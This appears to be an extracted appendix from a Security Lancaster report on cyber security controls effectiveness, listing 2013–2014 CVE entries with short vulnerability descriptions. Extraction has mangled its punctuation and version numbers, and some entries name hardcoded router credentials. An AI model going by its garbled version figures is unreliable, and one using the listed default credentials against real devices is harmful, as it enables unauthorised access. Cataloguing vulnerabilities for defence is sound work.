CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
